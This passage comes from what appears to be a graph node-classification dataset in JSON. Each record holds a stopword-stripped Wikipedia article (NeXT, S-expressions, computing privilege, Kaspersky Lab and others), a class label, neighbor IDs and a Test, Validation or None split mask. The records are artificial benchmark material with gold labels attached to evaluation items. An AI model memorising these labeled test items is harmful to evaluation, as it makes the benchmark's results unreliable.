prüfung doloser handlungen it-revision it-audit und it-compliance,95-121 doi:10.1007/978-3-658-23765-3_4 wrightson t. 2015 advanced persistent threat hacking art science hacking organization ny ny mcgraw-hill education",
    "neighbors": [
      3843,
      4133,
      357,
      9256,
      7440,
      2324,
      7703,
      9688,
      9950,
      5087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7799,
    "label": 5,
    "text": "Comparison_of_T-carrier_and_E-carrier_systems:comparison t-carrier e-carrier systems ds designations used connection north american hierarchy strictly speaking ds1 data carried t1 circuit likewise ds3 t3 practice terms used interchangeably data rates use e.g. military systems operate six eight times ds1 rate least one manufacturer commercial system operates 90 mbit/s twice ds3 rate new systems take advantage high data rates offered optical communications links also deployed development higher data rates often achieved using synchronous optical networking sonet synchronous digital hierarchy sdh ds3 delivered native copper trunk ds3 may converted optical fiber run needing longer distances termination points ds3 delivered fiber still analog type trunk connection termination points delivering data oc3 greater sonet used ds3 transported sonet encapsulated sts-1 sonet channel oc-3 sonet link contains three sts-1s therefore may carry three ds3s likewise oc-12 oc-48 oc-192 may carry 12 48 192 ds3s respectively",
    "neighbors": [
      8192,
      10100,
      4963,
      3156
    ],
    "mask": "None"
  },
  {
    "node_id": 7800,
    "label": 8,
    "text": "Link_contract:link contract link contract approach data control distributed data sharing network link contracts key feature xdi specifications development oasis xdi link contract machine-readable xdi document governs sharing xdi data unlike conventional web link essentially one-dimensional string pulls linked document browser link contract graph metadata typically json actively control flow data publisher subscriber either push pull flow controlled terms contract flexible extensible real-world contracts i.e. link contracts govern like real-world contracts link contracts also refer link contracts using design vast majority link contracts simple referring small number complex link contracts carefully designed reflect requirements common data exchange scenarios e.g. business cards mailing lists e-commerce transactions website registrations etc link contracts proposed key element digital trust frameworks published non-profit open identity exchange",
    "neighbors": [
      4979
    ],
    "mask": "Test"
  },
  {
    "node_id": 7801,
    "label": 3,
    "text": "Namco_System_11:namco system 11 namco system 11 arcade system board released namco 1994 actual hardware based sony playstation home console thus many games ported console major difference two system 11 used surface-mounted rom chips store game data whereas playstation used cd-rom meant system 11 games unique particular system board could swapped another game system 11 succeeded system 12 design although system 11 technically inferior sega model 2 arcade board lower price made attractive prospect smaller arcades according june 1995 issue edge psx based",
    "neighbors": [
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      7234,
      1091,
      9543,
      10056,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      6250,
      1776,
      3824,
      5746,
      7028,
      8316,
      6781
    ],
    "mask": "Test"
  },
  {
    "node_id": 7802,
    "label": 3,
    "text": "Scalability:scalability scalability property system handle growing amount work adding resources system economic context scalable business model implies company increase sales given increased resources example package delivery system scalable packages delivered adding delivery vehicles however packages first pass single warehouse sorting system would scalable one warehouse handle limited number packages computing scalability characteristic computers networks algorithms networking protocols programs applications example search engine must support increasing numbers users number topics indexes incident command system ics emergency management system used across emergency response agencies united states ics scale resource coordination single-engine roadside brushfire interstate wildfire first resource scene establishes command authority order resources delegate responsibility managing five seven officers delegate seven incident grows incident expands senior officers assume command scalability measured multiple dimensions resources fall two broad categories horizontal vertical scaling horizontally out/in means adding nodes removing nodes system adding new computer distributed software application example might involve scaling one web server three high-performance computing applications seismic analysis biotechnology workloads scaled horizontally support tasks would required expensive supercomputers workloads large social networks exceed capacity largest supercomputer handled scalable systems exploiting scalability requires software efficient resource management maintenance scaling vertically up/down means adding resources removing resources single node typically involving addition cpus memory storage single computer larger numbers elements increases management complexity sophisticated programming allocate tasks among resources handle issues throughput latency across nodes applications scale horizontally note network function virtualization defines terms differently scaling out/in ability scale add/remove resource instances e.g virtual machine whereas scaling up/down ability scale changing allocated resources e.g memory/cpu/storage capacity scalability databases requires database system able perform additional work given greater hardware resources additional servers processors memory storage workloads continued grow demands databases followed suit algorithmic innovations include row-level locking table index partitioning architectural innovations include shared nothing shared everything architectures managing multi-server configurations context scale-out data storage scalability defined maximum storage cluster size guarantees full data consistency meaning ever one valid version stored data whole cluster independently number redundant physical data copies clusters provide lazy redundancy updating copies asynchronous fashion called 'eventually consistent type scale-out design suitable availability responsiveness rated higher consistency true many web file hosting services web caches want latest version wait seconds propagate classical transaction-oriented applications design avoided many open source even commercial scale-out storage clusters especially built top standard pc hardware networks provide eventual consistency idem nosql databases like couchdb others mentioned write operations invalidate copies often n't wait acknowledgements read operations typically n't check every redundant copy prior answering potentially missing preceding write operation large amount metadata signal traffic would require specialized hardware short distances handled acceptable performance i.e act like non-clustered storage device database whenever strong data consistency expected look indicators indicators eventually consistent designs suitable transactional applications often advised focus system design hardware scalability rather capacity typically cheaper add new node system order achieve improved performance partake performance tuning improve capacity node handle approach diminishing returns discussed performance engineering example suppose 70 program sped parallelized run multiple cpus instead one formula_1 fraction calculation sequential formula_2 fraction parallelized maximum speedup achieved using p processors given according amdahl law substituting value example using 4 processors get double compute power 8 processors get doubling processing power improved speedup roughly one-fifth whole problem parallelizable speed would also double therefore throwing hardware necessarily optimal approach context high performance computing two common notions scalability",
    "neighbors": [
      8706,
      5,
      9222,
      9225,
      4107,
      6156,
      8204,
      7699,
      8725,
      1047,
      1049,
      2586,
      7204,
      39,
      6184,
      10792,
      50,
      7218,
      9782,
      10807,
      2113,
      1606,
      7753,
      4696,
      2140,
      4194,
      9314,
      4708,
      10340,
      5223,
      8810,
      4205,
      9837,
      3696,
      11377,
      6774,
      3197,
      9343,
      10368,
      11393,
      2179,
      4229,
      10377,
      5772,
      7313,
      6815,
      11423,
      8353,
      2210,
      5798,
      2217,
      2733,
      7868,
      4286,
      5832,
      6346,
      4817,
      4308,
      10452,
      2264,
      731,
      11487,
      755,
      5364,
      6909,
      8446,
      8447,
      8962,
      1801,
      4873,
      11017,
      1806,
      1808,
      785,
      6419,
      8981,
      7446,
      3863,
      1304,
      11542,
      7963,
      1309,
      6429,
      7453,
      7461,
      2345,
      4909,
      1332,
      8501,
      5948,
      8514,
      5956,
      2887,
      4423,
      7497,
      330,
      1866,
      8523,
      2901,
      4438,
      344,
      9561,
      2394,
      2395,
      11613,
      2910,
      11618,
      1891,
      11117,
      367,
      5999,
      7537,
      6003,
      2421,
      1913,
      3450,
      6014,
      11136,
      5518,
      11156,
      9621,
      7581,
      9631,
      9126,
      11179,
      10672,
      10675,
      10681,
      10686,
      8640,
      11201,
      1990,
      1480,
      1993,
      9677,
      467,
      468,
      7126,
      2008,
      5090,
      10212,
      7142,
      2536,
      508,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 7803,
    "label": 9,
    "text": "Krypton_(programming_language):krypton programming language krypton styled krypton frame-based computer programming language",
    "neighbors": [
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 7804,
    "label": 2,
    "text": "Privilege_(computing):privilege computing computing privilege defined delegation authority perform security-relevant functions computer system privilege allows user perform action security consequences examples various privileges include ability create new user install software change kernel functions users delegated extra levels control called privileged users lack privileges defined unprivileged regular normal users privileges either automatic granted applied automatic privilege exists requirement permission perform action example systems people required log system use logging require privilege systems implement file protection ms-dos essentially give unlimited privilege perform action file granted privilege exists result presenting credential privilege granting authority usually accomplished logging system username password username password supplied correct user granted additional privileges privilege applied either executed program issuing request advanced privileges running program apply additional privileges example user applying additional privileges provided sudo command run command root user kerberos authentication system modern processor architectures multiple cpu modes allows os run different privilege levels processors two levels user supervisor i386+ processors four levels 0 3 least privileges tasks tagged privilege level resources segments pages ports etc privileged instructions tagged demanded privilege level task tries use resource execute privileged instruction processor determines whether permission protection fault interrupt generated prevents user tasks damaging os computer programming exceptions related privileged instruction violations may caused array accessed bounds invalid pointer dereferenced invalid memory location referenced privileged location one controlling device input/output particularly likely occur programming languages c use pointer arithmetic check array bounds automatically unix-like systems superuser commonly known 'root owns privileges ordinary users granted enough permissions accomplish common tasks unix systems built-in security features users set new user account administrative procedures user “ root ” special user something called super-user anything system high degree power necessary fully administer unix system also allows user make mistake cause system problems unprivileged users usually windows nt-based systems privileges delegated varying degrees delegations defined using local security policy manager secpol.msc following abbreviated list default assignments windows defines number administrative privileges assigned individually users and/or groups account user holds privileges granted either directly indirectly group memberships upon installation number groups accounts created privileges granted however grants changed later time though group policy unlike linux privileges implicitly permanently granted specific account administrative privileges e.g taking ownership restoring arbitrary files powerful used malicious intent could allow entire system compromised user account control default since windows vista windows strip user token privileges login thus user logs account broad system privileges he/she still running system privileges whenever user wants perform administrative actions requiring system privileges he/she elevated process launching elevated process user made aware his/her administrative privileges asserted prompt requiring his/her consent holding privileges actually required keeping principle least privilege elevated processes run full privileges user full privileges system even privileges user may still required particular process thus completely least privilege dos-based windows windows 98 windows 95 previous versions non-nt windows operated fat filesystem support filesystem permissions. therefore privileges effectively defeated windows nt-based systems use ntfs file system names used windows source code end either privilege logonright led confusion full set rights privileges called microsoft currently uses term user rights past terms also used microsoft privilege rights logon user rights nt-rights",
    "neighbors": [
      8976,
      2193,
      3857,
      2323,
      5397,
      8344,
      537,
      10392,
      6812,
      3873,
      3366,
      9640,
      174,
      11184,
      2097,
      5682,
      7601,
      3254,
      700,
      6078,
      3395,
      9540,
      5325,
      9166,
      6098,
      10835,
      3542,
      728,
      8281,
      3419,
      7515,
      1379,
      1509,
      8551,
      8815,
      2164,
      7030,
      9336,
      10361,
      8954,
      10366
    ],
    "mask": "Test"
  },
  {
    "node_id": 7805,
    "label": 9,
    "text": "S-expression:s-expression computing s-expressions sexprs sexps symbolic expression notation nested list tree-structured data invented popularized programming language lisp uses source code well data usual parenthesized syntax lisp s-expression classically defined second recursive part definition represents ordered pair means s-expressions binary trees definition atom varies per context original definition john mccarthy assumed existed infinite set distinguishable atomic symbols represented strings capital latin letters digits single embedded blanks i.e. character string numeric literals modern sexpr notations addition use abbreviated notation represent lists s-expressions stands codice_4 special end-of-list object alternatively written codice_5 representation scheme lisp family programming languages s-expressions used represent source code data uses s-expressions lisp-derived languages dsssl mark-up communications protocols like imap john mccarthy cbcl details syntax supported data types vary different languages common feature among languages use s-expressions prefix notation many variants s-expression format supporting variety different syntaxes different datatypes widely supported character codice_15 often used prefix extensions syntax e.g codice_16 hexadecimal integers codice_17 characters representing source code lisp first element s-expression commonly operator function name remaining elements treated arguments called prefix notation polish notation example boolean expression written codice_18 c represented codice_19 lisp s-expr-based prefix notation noted precise definition atom varies across lisp-like languages quoted string typically contain anything quote unquoted identifier atom typically contain anything quote whitespace characters parenthesis brackets braces backslash semicolon either case prohibited character typically included escaping preceding backslash unicode support varies recursive case s-expr definition traditionally implemented using cons cells s-expressions originally intended data manipulated m-expressions first implementation lisp interpreter s-expression encodings m-expressions lisp programmers soon became accustomed using s-expressions code data means lisp homoiconic primary representation programs also data structure primitive type language nested lists written s-expressions codice_20 two-element s-expression whose elements also two-element s-expressions whitespace-separated notation used lisp article typical line breaks newline characters usually qualify separators simple context-free grammar tiny subset english written s-expression gazdar/melish natural language processing lisp s=sentence np=noun phrase vp=verb phrase v=verb program code written s-expressions usually using prefix notation example common lisp s-expressions read lisp using function read read reads textual representation s-expression returns lisp data function print used output s-expression output read function read printed data objects readable representation lisp readable representations numbers strings symbols lists many data types program code formatted pretty printed s-expressions using function pprint note two ps short pretty -print lisp programs valid s-expressions s-expressions valid lisp programs codice_21 valid s-expression valid lisp program since lisp uses prefix notation floating point number 1.0 valid operation first element expression s-expression preceded single quotation mark codice_22 syntactic sugar quoted s-expression case codice_23 s-expressions often compared xml key difference s-expressions far simpler syntax therefore much easier parse standards lisp-derived programming languages include specification s-expression syntax include common lisp ansi standard document ansi incits 226-1994 r2004 scheme r5rs r6rs islisp may 1997 ron rivest submitted internet-draft considered publication rfc draft defined syntax based lisp s-expressions intended general-purpose data storage exchange similar xml rather specifically programming never approved rfc since cited used rfcs e.g rfc 2693 several publications originally intended use spki rivest format defines s-expression either octet-string series bytes finite list s-expressions describes three interchange formats expressing structure one advanced transport flexible terms formatting syntactically similar lisp-style expressions identical advanced transport example allows octet-strings represented verbatim string length followed colon entire raw string quoted form allowing escape characters hexadecimal base64 placed directly token meets certain conditions rivest tokens differ lisp tokens former convenience aesthetics treated exactly like strings latter specific syntactical meaning rivest draft defines canonical representation digital signature purposes intended compact easier parse unique abstract s-expression allows verbatim strings prohibits whitespace formatting outside strings finally basic transport representation either canonical form encoded base64 surrounded braces latter intended safely transport canonically encoded s-expression system might change spacing e.g email system 80-character-wide lines wraps anything longer format widely adapted use outside spki users gnupg libgcrypt nettle gnu lsh rivest s-expressions web page provides c source code parser generator available mit license could adapted embedded programs addition restrictions independently implementing format",
    "neighbors": [
      10752,
      2050,
      5635,
      4101,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      5651,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      10868,
      5751,
      1159,
      9865,
      9871,
      9877,
      5803,
      2225,
      7867,
      4799,
      10435,
      7880,
      10953,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      8430,
      5360,
      5361,
      9454,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      2316,
      8973,
      1301,
      10012,
      3869,
      5917,
      2335,
      2849,
      3370,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      7539,
      3446,
      10104,
      377,
      4992,
      8582,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      2481,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      479,
      4064,
      3051,
      5611,
      7670,
      11255,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7806,
    "label": 2,
    "text": "NeXT:next next inc. later next computer inc. next software inc. american computer software company founded 1985 apple computer co-founder steve jobs name usually pronounced next based redwood city california company developed manufactured series computer workstations intended higher education business markets next founded jobs fired apple along several co-workers next introduced first next computer 1988 smaller nextstation 1990 next computers experienced relatively limited sales estimates 50,000 units shipped total nevertheless innovative object-oriented nextstep operating system development environment interface builder highly influential first major outside investment ross perot invested seeing segment next entrepreneurs 1987 invested 20 million exchange 16 percent next stock subsequently joined board directors 1988 next later released much nextstep system programming environment standard called openstep next withdrew hardware business 1993 concentrate marketing openstep mach openstep implementation several original equipment manufacturers oems next also developed webobjects one first enterprise web application frameworks webobjects never became popular initial high price 50,000 remains prominent early example web server based dynamic page generation rather static content apple purchased next 1997 429 million equivalent million 1.5 million shares apple stock part agreement steve jobs chairman ceo next software returned apple company co-founded 1976 founder promised merge software next apple hardware platforms eventually resulting macos ios watchos tvos operating systems completely based upon nextstep openstep foundation 1985 apple co-founder steve jobs led apple supermicro division responsible development macintosh lisa personal computers macintosh successful university campuses partly apple university consortium allowed students institutions buy computers discount consortium earned 50 million computers february 1984 chairman jobs visited university departments faculty members sell macintosh jobs met paul berg nobel laureate chemistry luncheon held silicon valley honor françois mitterrand president france berg frustrated expense teaching students recombinant dna textbooks instead wet laboratories used testing analysis chemicals drugs materials biological matter wet labs prohibitively expensive lower-level courses complex simulated personal computers time berg suggested jobs use influence apple create 3m computer workstation higher education featuring least one megabyte random-access memory ram megapixel display megaflops performance hence name 3m jobs intrigued berg concept workstation contemplated starting higher education computer company fall 1985 amidst increasing turmoil apple jobs division release upgraded versions macintosh much macintosh office system result sales plummeted apple forced write millions dollars unsold inventory apple chief executive officer ceo john sculley ousted jobs day-to-day role apple replacing jean-louis gassée 1985 later year jobs began power struggle regain control company board directors sided sculley jobs took business visit western europe soviet union behalf apple several months sidelined jobs resigned apple september 13 1985 told board leaving set new computer company would taking several apple employees supermicro division also told board new company would compete apple might even consider licensing designs back market macintosh brand jobs named new company next inc. number former apple employees followed next including joanna hoffman bud tribble george crow rich page susan barnes susan kare dan l lewin consulting major educational buyers around country including follow-up meeting paul berg tentative specification workstation drawn designed powerful enough run wet lab simulations cheap enough college students use dormitory rooms specifications finished however apple sued next nefarious schemes take advantage cofounders insider information jobs remarked hard think 2 billion company 4,300-plus people could n't compete six people blue jeans suit eventually dismissed trial 1986 jobs recruited famous graphic designer paul rand create brand identity costing 100,000 jobs recalled asked would come options said 'no solve problem pay ’ use solution want options go talk people rand created 20-page brochure detailing brand including precise angle used logo 28° new company name spelling next next changed business plan mid-1986 company decided develop computer hardware software instead low-end workstation team led avie tevanian joined company working one mach kernel engineers carnegie mellon university develop nextstep operating system hardware division led rich page — one cofounders previously led apple lisa team — designed developed hardware next first factory completed fremont california 1987 capable producing 150,000 machines per year next first workstation officially named next computer although widely termed cube distinctive case 1 ft magnesium cube designed apple iic case designer frogdesign accordance edict jobs original design team anticipated releasing computer us 3,000 spring 1987 ready sale summer year next computer received standing ovations revealed lavish invitation-only gala event next introduction — introduction next generation computers education louise m. davies symphony hall san francisco california wednesday october 12 1988 following day selected educators software developers invited 100 registration fee attend first public technical overview next computer event called next day held san francisco hilton event gave developers interested developing next software insight software architecture object-oriented programming developing next computer luncheon speaker steve jobs first machines tested 1989 next started selling limited numbers universities beta version nextstep operating system installed initially next computer targeted u.s. higher education establishments base price 6,500 machine widely reviewed magazines generally concentrating hardware asked upset computer debut delayed several months jobs responded late computer five years ahead time next computer based new 25 mhz motorola 68030 central processing unit cpu motorola 88000 risc chip originally considered available sufficient quantities included 8 64 mb random-access memory ram 256 mb magneto-optical mo drive 40 mb swap-only 330 mb 660 mb hard disk drive 10base2 ethernet nubus 17-inch megapixel grayscale display measuring 1120 832 pixels 1989 typical new pc macintosh amiga computer included megabytes ram 640×480 16-color 320x240 4000-color display 10 20 megabyte hard drive networking capabilities also first computer ship general-purpose dsp chip motorola 56001 motherboard used support sophisticated music sound processing including music kit software magneto-optical drive manufactured canon inc. used primary mass storage device drives relatively new market next first computer use cheaper hard drives blank media especially though cost 150 canon jobs negotiations saw canon agree retail 50 apiece slower average seek time 96 ms design made impossible move files computers without network since next computer one mo drive disk could removed without shutting system storage options proved challenging first next computers magneto-optical media relatively expensive performance reliability problems despite faster floppy drive drive sufficient run primary medium running nextstep operating system terms speed capacity 1989 next struck deal former compaq reseller businessland sell next computers select markets nationwide selling retailer major change next original business model selling directly students educational institutions businessland founder david norman predicted sales next computer would surpass sales compaq computers 12 months 1989 canon invested us 100 million next giving 16.67 percent stake making next worth almost 600 million canon invested next condition would able use nextstep environment workstations would mean greatly expanded market software next exited hardware business canon produced line pcs called object.station including models 31 41 50 52 specifically designed run nextstep/intel canon also served next distributor japan next computers first released retail market 1990 9,999 next original investor ross perot resigned board directors june 1991 dedicate time perot systems plano texas-based systems integrator next released second generation workstations 1990 new range included revised next computer renamed nextcube nextstation nicknamed slab pizza box case form-factor jobs explicit ensuring next staff use latter terminology lest next machines compared competing sun workstations already nickname magneto-optical drive replaced 2.88 mb floppy drive 2.88 mb floppy disks expensive technology supplant 1.44 mb floppy realizing next utilized cd-rom drive eventually became industry standard storage color graphics available nextstation color nextdimension graphics processor hardware nextcube new computers cheaper faster predecessors new motorola 68040 processor 1992 next launched turbo variants nextcube nextstation 33 mhz 68040 processor maximum ram capacity increased 128 mb next sold 20,000 computers 1992 next counted upgraded motherboards back order system sales — small number compared competitors however company reported sales 140 million year encouraging canon invest 30 million keep company afloat total 50,000 next machines sold including thousands super secret national reconnaissance office located chantilly virginia next long-term aim migrate risc reduced instruction set computing architecture processor design strategy intended increase performance project known next risc workstation nrw initially nrw based motorola 88110 processor due lack confidence motorola commitment 88000-series architecture later redesigned around dual powerpc 601s next produced motherboards enclosures exited hardware business full production next computers delivered mathematica pre-installed several developers used next platform write pioneering programs tim berners-lee used next computer 1990 create first web browser web server accordingly next instrumental development world wide web next used professors scientific engineering applications developing finished newspaper layouts using news george mason university early 1990s set next workstations publishing well silicon graphics cad/gl mathematica astrophysics games doom quake developed id software next machines games based doom engine heretic raven software well strife rogue entertainment also developed next hardware using id tools commercial programs released next computers including altsys virtuoso vector drawing program page-layout features ported mac os microsoft windows aldus freehand v4 lotus improv spreadsheet program systems bundled number smaller built-in applications merriam-webster collegiate dictionary oxford quotations complete works william shakespeare digital librarian search engine access next started porting nextstep operating system ibm pc compatible computers using intel 80486 processor late 1991 change business strategy withdraw hardware business entirely demonstration port displayed nextworld expo january 1992 mid-1993 product complete version 3.1 also known nextstep 486 released prior release chrysler planned buy 3,000 copies 1992 nextstep 3.x later ported pa-risc sparc-based platforms total four versions nextstep/next next 68k black boxes nextstep/intel nextstep/pa-risc nextstep/sparc although ports widely used nextstep gained popularity institutions first chicago nbd swiss bank corporation o'connor company organizations owing programming model used many american federal agencies united states naval research laboratory national security agency advanced research projects agency central intelligence agency national reconnaissance office ibm pc clone vendors offered somewhat customized hardware solutions delivered running nextstep intel elonex nextstation canon object.station 41 next withdrew hardware business 1993 company renamed next software inc consequently 300 540 staff employees laid next negotiated sell hardware business including fremont factory canon later pulled deal work powerpc machines stopped along hardware production ceo sun microsystems scott mcnealy announced plans invest 10 million 1993 use next software future sun systems next partnered sun create openstep nextstep application layer hosted third party operating system exiting hardware business next focused operating systems effect returning original business plan new products based openstep released including openstep enterprise version microsoft windows nt company launched webobjects platform building large-scale dynamic web applications many large businesses including dell disney worldcom bbc used webobjects short time eventually webobjects used solely power apple itunes store corporate website discontinuing apple computer announced intention acquire next december 20 1996 apple paid 429 million cash went initial investors 1.5 million apple shares went steve jobs deliberately given cash part deal main purpose acquisition use nextstep foundation replace dated classic mac os instead beos in-development copland deal finalized february 7 1997 bringing jobs back apple consultant later appointed interim ceo 2000 jobs took ceo position permanent assignment holding position resignation august 24 2011 jobs died six weeks later october 5 2011 complications relapsed pancreatic neuroendocrine tumor several next executives replaced apple counterparts steve jobs restructured company board directors next five years nextstep operating system ported powerpc architecture time intel port openstep enterprise toolkit windows produced operating system code named rhapsody toolkit development platforms called yellow box backwards compatibility apple added blue box rhapsody allowing existing mac applications run self-contained cooperative multitasking environment server version new operating system released mac os x server 1.0 1999 first consumer version mac os x 10.0 2001 openstep developer toolkit renamed cocoa rhapsody blue box renamed classic environment changed run applications full-screen without requiring separate window apple included updated version original macintosh toolbox called carbon gave existing mac applications access environment without constraints blue box nextstep interface features used mac os x including dock services menu finder column view cocoa text system nextstep processor-independent capabilities retained mac os x leading powerpc intel x86 versions although powerpc versions publicly available 2006 apple moved intel processors august 2006 jobs created different corporate culture next terms facilities salaries benefits jobs experimented structural changes apple next abandoned conventional corporate structures instead making community members instead employees two different salaries next early 1990s team members joined 1986 paid 75,000 joined afterwards paid 50,000 caused awkward situations managers paid less employees employees given performance reviews raises every six months spartan salary plans foster openness employees full access payrolls although employees ever took advantage privilege next health insurance plan offered benefits married couples unmarried couples same-sex couples although latter privilege later withdrawn due insurance complications payroll schedule also different companies silicon valley time instead getting paid twice month arrears end pay period employees would get paid month advance beginning words jobs found office space palo alto california 3475 deer creek road occupying glass concrete building featured staircase designed architect i. m. pei first floor used hardwood flooring large worktables workstations would assembled avoid inventory errors next used just-in-time jit inventory strategy company contracted major components mainboards cases finished components shipped first floor assembly second floor office space open floor plan enclosed rooms jobs office conference rooms next expanded office space needed company rented office 800 900 chesapeake drive redwood city also designed pei architectural centerpiece floating staircase visible supports open floor plan retained although furnishings became luxurious 5,000 chairs 10,000 sofas ansel adams prints next first campus palo alto subsequently occupied sap ag second campus redwood city occupied apnicure oncomed pharmaceuticals inc first issue nextworld magazine printed 1991 published san francisco integrated media edited michael miley later dan ruby mainstream periodical discuss next computers operating system next software publication discontinued 1994 four volumes nextworld expo followed developer conference held 1991 1992 san francisco civic center 1993 1994 moscone center san francisco steve jobs keynote speaker though profitable company wide-ranging impact computer industry object-oriented programming graphical user interfaces became common 1988 release nextcube nextstep technologically successful platform often held trendsetter companies started emulate success next object-oriented system widely seen response next microsoft announced cairo project 1991 cairo specification included similar object-oriented user interface features coming consumer version windows nt although cairo ultimately abandoned elements integrated projects 1994 microsoft next collaborating windows nt port openstep never released 1993 taligent considered press competitor objects operating systems even without product release next main point comparison first years taligent theoretical newness often compared next older mature commercially established platform taligent debut release 1995 called little late especially compared next webobjects failed achieve wide popularity partly initial high price us 50,000 remains first prominent early example web application server enabled dynamic page generation based user interactions opposed static content webobjects bundled macos server xcode",
    "neighbors": [
      10755,
      9732,
      1549,
      7697,
      4114,
      8725,
      11289,
      3107,
      6186,
      6700,
      1074,
      9784,
      8253,
      576,
      5194,
      8783,
      9295,
      4180,
      10838,
      5210,
      6234,
      9826,
      1123,
      5733,
      8806,
      3691,
      8303,
      8304,
      5235,
      2676,
      3191,
      6264,
      124,
      2686,
      6783,
      10878,
      1666,
      2179,
      7299,
      137,
      7305,
      7307,
      8842,
      10899,
      7318,
      5784,
      1177,
      4251,
      11420,
      2207,
      3749,
      10406,
      11430,
      3241,
      171,
      5294,
      2735,
      3248,
      9391,
      11447,
      4283,
      7869,
      5829,
      713,
      9418,
      3790,
      7887,
      5840,
      7378,
      3286,
      9430,
      3293,
      4318,
      225,
      10470,
      231,
      2282,
      9451,
      1772,
      4844,
      9452,
      10478,
      1776,
      8944,
      242,
      8435,
      2804,
      8441,
      10491,
      9986,
      2819,
      4358,
      7943,
      1290,
      9999,
      784,
      8976,
      4888,
      10023,
      811,
      4399,
      7983,
      8505,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      2383,
      2388,
      350,
      6495,
      866,
      9063,
      10602,
      3948,
      11629,
      11118,
      7535,
      8048,
      10608,
      8051,
      9589,
      1399,
      1400,
      7544,
      6023,
      7561,
      6539,
      7057,
      7571,
      1428,
      2454,
      6554,
      3483,
      2979,
      9123,
      11173,
      11689,
      7594,
      8109,
      11184,
      8628,
      2492,
      446,
      7614,
      4544,
      9151,
      9665,
      2502,
      456,
      1482,
      10698,
      3533,
      464,
      6608,
      8662,
      9174,
      7640,
      9686,
      4571,
      7133,
      9182,
      5600,
      4068,
      5093,
      2023,
      8170,
      3563,
      6129,
      7154,
      5619,
      11257,
      8700,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 7807,
    "label": 7,
    "text": "Seeks:seeks seeks free open-source project licensed affero general public license version 3 agplv3 exists create alternative current market-leading search engines driven user concerns rather corporate interests original manifesto created emmanuel benazera sylvio drouin published october 2006 project active development april 2014 stable releases engine revisions source code available public use september 2011 seeks innovation award open world forum innovation awards seeks source code updated since april 28 2014 seeks nodes usable since february 6 2016 seeks aims give control ranking results users search algorithms often less accurate humans relies distributed collaborative filter let users personalize share preferred results search also openness source code users verify modify collaborative filter fit needs currently seeks used three main forms",
    "neighbors": [
      8640,
      7656,
      7276,
      7983,
      113,
      3573,
      823,
      1274
    ],
    "mask": "Test"
  },
  {
    "node_id": 7808,
    "label": 9,
    "text": "Greg_Morrisett:greg morrisett john gregory greg morrisett dean faculty computing information science cornell university morrisett allen b cutting professor computer science harvard school engineering applied sciences prior position cornell group cornell university created cyclone programming language current research interests applications programming language technology building secure reliable systems particular interested applications advanced type systems model checkers certifying compilers proof-carrying code inlined reference monitors building efficient provably secure systems also interested design application high-level languages new emerging domains sensor networks received phd jeannette wing robert harper carnegie mellon university 1995 2013 became fellow association computing machinery",
    "neighbors": [
      11505,
      5074,
      7394,
      1783
    ],
    "mask": "None"
  },
  {
    "node_id": 7809,
    "label": 4,
    "text": "Kaspersky_Lab:kaspersky lab kaspersky lab russian лаборатория касперского laboratoriya kasperskogo multinational cybersecurity anti-virus provider headquartered moscow russia operated holding company united kingdom founded 1997 eugene kaspersky natalya kaspersky alexey de-monderik eugene kaspersky currently ceo kaspersky lab develops sells antivirus internet security password management endpoint security cybersecurity products services kaspersky expanded abroad 2005–2010 grew 698 million annual revenues 2017 8 2016 though annual revenues 8 north america due u.s. government security concerns 2016 software 400 million users largest market-share cybersecurity software vendors europe kaspersky lab ranks fourth global ranking antivirus vendors revenue first russian company included rating world leading software companies called software top 100 79th list 6/29/2012 kaspersky lab ranked 4th endpoint security segment according idc data 2010 according gartner kaspersky lab currently third largest vendor consumer security software worldwide fifth largest vendor enterprise endpoint protection kaspersky lab named leader gartner magic quadrant endpoint protection platforms kaspersky global research analysis team great led discovery sophisticated espionage platforms conducted nations equation group stuxnet worm various covert government-sponsored cyber-espionage efforts uncovered research kaspersky also publishes annual global security risks survey 2014 kaspersky research hubs analyze 350,000 malware samples per day kaspersky faced controversy allegations engaged russian federal security service fsb —ties company actively denied u.s. department homeland security banned kaspersky products government departments 13 september 2017 october 2017 subsequent reports alleged hackers working russian government stole confidential data home computer american national security agency contractor via kaspersky antivirus software kaspersky denied allegations reporting software detected equation group malware samples uploaded servers analysis normal course operation company since announced commitments increased accountability soliciting independent reviews verification software source code announcing would migrate core infrastructure foreign customers russia switzerland first version kaspersky lab antivirus software developed eugene kaspersky 1989 response cascade virus early versions 40 virus definitions mostly distributed friends family members eugene continued developing software kami resulting antiviral toolkit pro avp product released 1992 popularized 1994 competitive analysis hamburg university gave eugene software first place 1997 eugene kaspersky wife natalya kaspersky alexey de-monderik left kami form kaspersky lab continue developing antivirus product called avp product renamed kaspersky anti-virus american company registered avp trademark us 1998 taiwanese student released virus called cih first three weeks outbreak kaspersky lab avp software time able remove increased demand led deals antivirus companies japan finland germany integrate avp software according wired kaspersky software advanced time example first software monitor viruses isolated quarantine company revenue grew 280 percent 1998 2000 60 percent revenue coming foreign sales natalya worked broker deals abroad localize software opened offices uk poland holland china later expanded germany france us japan 2000 company 65 employees sales 40 countries kaspersky opened new offices south east asia middle east 2008 south africa 2009 also expanded india middle east africa 2010 2009 retail sales kaspersky lab antivirus products reached almost 4.5 million copies per year 2011 general atlantic bought 20 percent share kaspersky lab 200 million expectation helping company go public months later decision made keep firm private kaspersky re-purchased shares general atlantic followed numerous executive departures 2011 2014 regarding disputes going public eugene management style january 1 2012 